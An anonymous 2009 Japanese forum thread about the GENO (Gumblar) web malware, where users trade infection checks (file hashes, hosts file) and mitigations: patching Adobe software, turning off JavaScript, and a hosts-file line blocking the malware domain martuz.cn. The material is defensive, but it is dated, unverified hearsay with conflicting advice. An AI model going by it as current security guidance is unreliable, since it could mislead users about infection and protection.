139:名無しさん@お腹いっぱい。
09/05/28 13:38:59
携帯でGENOウイルスのURL踏んじゃったんだけど、
携帯にも影響あるの?
140:名無しさん@お腹いっぱい。
09/05/28 13:44:03
>>139
クリーンインストール
141:名無しさん@お腹いっぱい。
09/05/28 13:49:03
おいおまいら
俺のケツの穴見たいか?
糞ひねり出すとこ見たいか?
142:名無しさん@お腹いっぱい。
09/05/28 13:49:08
>>140
え、あるの・・・?
データ流出とかはないよな・・・
143:名無しさん@お腹いっぱい。
09/05/28 14:27:45
>>142
> >>140
> え、あるの・・・?
> データ流出とかはないよな・・・
144:名無しさん@お腹いっぱい。
09/05/28 14:28:30
cmc確認、regedit確認、sqlsodbc.chmのファイルサイズ確認
nortonは普通に起動している、windowsupdateにもアクセス可能。
symantecにもアクセスできる。MD5も一致した。
問題なしですよね?
145:名無しさん@お腹いっぱい。
09/05/28 14:42:22
asahi.com(朝日新聞社)
新マルウエア「GENOウイルス」蔓延に注意(1/3ページ)
URLリンク(www.asahi.com)
146:名無しさん@お腹いっぱい。
09/05/28 15:46:39
いまだに騒いでるのは同人屋だけだと思ってた
147:名無しさん@お腹いっぱい。
09/05/28 16:08:49
>>144
不安があるならクリーンインストール
148:名無しさん@お腹いっぱい。
09/05/28 16:24:15
「GENOウイルス」
朝日新聞社のお墨付き
149:名無しさん@お腹いっぱい。
09/05/28 16:28:56
>>144
そこまで確認して不安ならOS再インスコ汁
150:名無しさん@お腹いっぱい。
09/05/28 16:43:50
終了
151:名無しさん@お腹いっぱい。
09/05/28 16:44:17
まだまだ続くよ〜!
152:名無しさん@お腹いっぱい。
09/05/28 17:11:01
Windows2000の場合でも、
Visual Studio 6 SP5 以降のバージョン、Microsoft SQL Server 2000、.NetFramework 1.1
等がインストールされている場合にはMDAC 2.6〜2.8 がインストールされているので
sqlsodbc.chm が存在する。
Office 2003をインストールしている場合もsqlsodbc.chm が存在してる可能性が有り。
通常は、Windows2000には同じsqlsodbcでもchmファイルではなく、 hlpファイルが常時存在し、
こちらは16.7 KB (17148 バイト) 、MD5:3177C8154F1011535FDD1B1B30D3D2E9
50727バイトじゃない!MD5:F639AFDE02547603A3D3930EE4BF8C12じゃない!感染してる!
と勘違いしてクリーンインストールしちゃった人が多そう・・・
153:名無しさん@お腹いっぱい。
09/05/28 17:22:01
>>152
chmファイルとhlpを見間違うのはマヌケ
クリーンインストールも止むを得なす
154:名無しさん@お腹いっぱい。
09/05/28 17:27:10
cmd、regeditが起動できてsqlsodbc.chmも改変されてなくて
特定のサイトにアクセスできないんだけどこれって感染してる
あと隠しファイルも表示できない
155:名無しさん@お腹いっぱい。
09/05/28 17:28:55
>>154
あたしエスパーだけどOS入れなおせばおk
156:名無しさん@お腹いっぱい。
09/05/28 17:31:26
今やってる
157:名無しさん@お腹いっぱい。
09/05/28 17:39:03
>>154
面倒だからOS再インスコ
158:名無しさん@お腹いっぱい。
09/05/28 17:49:16
さっきまで、まとめサイトのメニューに「稲川淳二」って項目があったけど、なんだったんだろう。
159:名無しさん@お腹いっぱい。
09/05/28 17:51:09
>>158
なにそれ?w なんで稲川淳二が・・・
160:名無しさん@お腹いっぱい。
09/05/28 18:01:48
バスターがアップデートできないんだけど…
これもGENO?
161:名無しさん@お腹いっぱい。
09/05/28 18:06:08
>>154
以前からそうならルータの問題の可能性も有
162:名無しさん@お腹いっぱい。
09/05/28 18:12:24
先週再インスコした時は平気だった
163:名無しさん@お腹いっぱい。
09/05/28 18:15:08
>>160
聞く前にちゃんと自分で調べようぜ!
164:名無しさん@お腹いっぱい。
09/05/28 18:46:38
>>160
期限切れてるんじゃね
165:名無しさん@お腹いっぱい。
09/05/28 19:27:47
新マルウエア「GENOウイルス」蔓延に注意(1/3ページ)
URLリンク(www.asahi.com)
166:名無しさん@お腹いっぱい。
09/05/28 20:23:14
GENOウイルス何って4月ごろに騒いでた奴だろ?
亜種も出て随分たってるのに
いまだに新マルウエアとか言ってるのか…
167:名無しさん@お腹いっぱい。
09/05/28 20:38:19
>>154
会社でフィルタリングかけてんじゃね
168:名無しさん@お腹いっぱい。
09/05/28 20:49:02
はいはいhostsファイル見て
トレンドマイクロがブロックされてたら
削ってね〜
169:名無しさん@お腹いっぱい。
09/05/28 22:56:40
終わったね
170:名無しさん@お腹いっぱい。
09/05/28 23:01:47
まだまだ続くよ〜!
と言いたいけど終わったね
171:名無しさん@お腹いっぱい。
09/05/28 23:07:32
今回を機にセキュリティーに目覚めたっつか、自分のPCを見つめ直す
機会にはなったんじゃないかな
操ってるのはあくまでも『人間』なんだしな
172:名無しさん@お腹いっぱい。
09/05/28 23:30:24
obfuscationがさらに高度になってきてるな
173:名無しさん@お腹いっぱい。
09/05/28 23:33:14
そうかそうか
174:名無しさん@お腹いっぱい。
09/05/28 23:54:18
ヴィスタだけどCPU使用率が異常なことになってる
これやばくないか
175:名無しさん@お腹いっぱい。
09/05/28 23:58:18
低スペック+AERO有効
176:名無しさん@お腹いっぱい。
09/05/28 23:59:44
ははっ わろす
177:名無しさん@お腹いっぱい。
09/05/29 00:00:23
いや今まで使用率なんて何も触ってなけりゃ3%前後なのに
常にコア1が90%ぐらいになってる
178:名無しさん@お腹いっぱい。
09/05/29 00:01:09
見に覚えがないなら(UAC無視してないなら)
sqlsodbc確認、ウィルススキャン&HijackThisのようなソフトで起動プロセスチェックして
問題なければ再起動して様子を見る
179:名無しさん@お腹いっぱい。
09/05/29 00:02:28
アンチウィルスFWソフトもたまに暴走するからな
例えば、ウィルスバスターとかウィルスバスターとかウィルスバスターとか!
180:名無しさん@お腹いっぱい。
09/05/29 00:07:08
バスターは自分をバスターし始める
181:名無しさん@お腹いっぱい。
09/05/29 00:07:34
ウィルスバスターかもしれんw
>>178
sqlsodbcってVistaに存在してる?
182:名無しさん@お腹いっぱい。
09/05/29 00:09:26
>>181
>>90
183:名無しさん@お腹いっぱい。
09/05/29 00:13:08
システムファイルの発見はCドライブごと検索するようこころがけるだけでこんなつまらんレスはなくなるだろう
184:名無しさん@お腹いっぱい。
09/05/29 00:16:09
始まったな
185:名無しさん@お腹いっぱい。
09/05/29 00:19:26
>>131
お前は人間失格だな
少しは>>127さんを見習え
186:名無しさん@お腹いっぱい。
09/05/29 00:21:55
掘り返すなよ・・
187:172
09/05/29 00:22:49
いやあ、俺の発見したサイトはユーザーブロッキング機能によって
2度目の攻撃は行わないようになってたわ
察知されにくいようにしてるな
188:名無しさん@お腹いっぱい。
09/05/29 00:24:23
ウイルスバスターって人気ですね!
189:名無しさん@お腹いっぱい。
09/05/29 00:25:45
人気ですが、何か
190:名無しさん@お腹いっぱい。
09/05/29 00:27:30
バスター?
妨害攻撃で撃沈されてしまうけどね
191:172
09/05/29 01:06:32
いやあ、入手した検体アンチオンラインスキャン、アンチリバースエンジニアリング、
アンチVMなどのアンチ仮想環境すべてかかってるわ
192:名無しさん@お腹いっぱい。
09/05/29 01:15:02
感染して、先ほどリカバリした漏れです。
ふと思ったんだけれど、ファイアウォール導入してもGENOには無効?
193:名無しさん@お腹いっぱい。
09/05/29 01:16:08
終了
194:名無しさん@お腹いっぱい。
09/05/29 01:26:01
p
195:172
09/05/29 01:55:46
>>192
うん、無効
HIPS入れてかろうじて何とかなるかならないか
196:名無しさん@お腹いっぱい。
09/05/29 03:11:32
誰でも出来る簡単な対策
Vista使いましょう
197:名無しさん@お腹いっぱい。
09/05/29 03:21:53
つーか、使ってるAdobeを最新にしていればとりあえず今は大丈夫なんでそ?
198:名無しさん@お腹いっぱい。
09/05/29 03:24:44
あとjsの無効
jsでとばされる先の感染サイトがあったドメインへの
アクセス制限(暫定)
199:名無しさん@お腹いっぱい。
09/05/29 03:27:36
それは、Adobe Readerのjavascript設定限定での話?
それともブラウザ自体のscriptも常時切らないと駄目なのか(切らないと完全アウトかどうか)?
200:名無しさん@お腹いっぱい。
09/05/29 03:32:54
>>199
>>1
201:名無しさん@お腹いっぱい。
09/05/29 03:38:31
テンプレは特定のブラウザの導入とPDF、flashとjsの無効を推奨しているように見えるし不便過ぎる(firefoxが何たらの項。)
もう感染してもいいから自分のお気に入りのサイトくらいは許可するよ
楽天で個人情報既に抜かれてるし自サイト(ブログ放置くらい)、カードないし別にいいや
202:名無しさん@お腹いっぱい。
09/05/29 03:41:52
>>199
現在のところはAdobe Reader側だけでOK。
ブラウザ側も保険として勧められているだけ。
203:名無しさん@お腹いっぱい。
09/05/29 03:55:54
Genoよりエロゲ規制の方が数倍恐いわ
204:名無しさん@お腹いっぱい。
09/05/29 04:17:35
ここ ↓ やられてるのかな?反応して遮断するんだけど、「ハリスの太さ」で検索してたらあった。
グレ、チヌの視力でハリスは見えるのかとマキエの摂取量
URLリンク(www.geocities.co.jp)
205:名無しさん@お腹いっぱい。
09/05/29 04:27:07
>>204
やられてるねえ
martuz●cn行き
206:名無しさん@お腹いっぱい。
09/05/29 04:31:38
martuzは停止してるんじゃなかったっけ
207:名無しさん@お腹いっぱい。
09/05/29 04:34:09
たぶんね
改竄されてるかどうかとは関係ないけど
208:204
09/05/29 04:50:53
そうなんだ、やられていたか
俺みたいに行動範囲の狭い人間ですらぶち当たるってことは
相当ひどいってことだな
こりゃ気をつけにゃいかんわ
ありがと
209:名無しさん@お腹いっぱい。
09/05/29 05:34:33
見つけたんだったらここで報告するより
サイト管理者に連絡してあげたらいいのに
何がしたいんだ
ま、まさか 釣り とか
210:名無しさん@お腹いっぱい。
09/05/29 05:39:18
■ adobe javascriptをオフに
adobe readerを開いて メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す
↑これは英語版ではどこをどう選んだらいいのでしょうか?
adobe reader9入れてから日本語パッチあてたり出来るんでしょうか?
211:210
09/05/29 06:04:19
日本語版入れなおしました
adobe javascript=acrobat javascriptでおkなのでしょうか?
adobe javascriptなる項目が存在せずacrobat javascriptというのがあるのですが
212:210
09/05/29 06:38:37
自己りますた
213:名無しさん@お腹いっぱい。
09/05/29 07:26:49
>>201
こうゆうヤツが普通にいるからネットは免許制&過失罪制度が必要なんだよ
自分の利便性最優先とか、どんだけ非社会的なんだよ
214:名無しさん@お腹いっぱい。
09/05/29 07:33:28
yabeeeesqlsodbc.chmが0byteになってた
ちゃんと最新のに変えてjavaも切ってたのに何でだ
215:名無しさん@お腹いっぱい。
09/05/29 07:41:16
0byte化報告は前にもみたな
genoっていうか、別物に感染したんじゃないか?
216:名無しさん@お腹いっぱい。
09/05/29 08:49:10
acrobatやflashの脆弱性を付いてクラッシュさせることで初めてパスなんかを盗むウィルスなんだから
JAVAスクリプトがONかOFFかはあんまり関係なさそうだな
217:名無しさん@お腹いっぱい。
09/05/29 08:56:37
>>216
クラッシュはsniffing動作と関係ないだろ。
218:名無しさん@お腹いっぱい。
09/05/29 08:57:59
クラッシュさせるサイトにとばすのに
js使ってるんでないの?
だからFireFoxのリンク先の画像先読みする機能を
オフにする話が出ると思った
219:名無しさん@お腹いっぱい。
09/05/29 09:20:31
修正案
■ adobe readerを9.1.0にアップデートする
とりあえず最新版にしましょう。
220:名無しさん@お腹いっぱい。
09/05/29 09:24:47
■ adobe flashplayerを最新版に更新
URLリンク(www.adobe.com)
221:名無しさん@お腹いっぱい。
09/05/29 09:40:08
以上でGENOは防げるが亜種等のため以下推奨
■ adobe javascriptをオフに
adobe readerを開いて メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
FirefoxにてNoscriptを利用
(Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
(sleipnir、IEでも上手に設定するとなんとかなります)
■ hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 martuz.cn
hostsファイルの在処
Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
Windows 95/98/MEの場合→「C:\Windows」
222:名無しさん@お腹いっぱい。
09/05/29 09:42:18
動画サイトは見ない方が良いのか
223:名無しさん@お腹いっぱい。
09/05/29 09:49:57
対策してればどんどんみれ
次ページ最新レス表示スレッドの検索類似スレ一覧話題のニュースおまかせリスト▼オプションを表示暇つぶし2ch
5390日前に更新/180 KB
担当:undef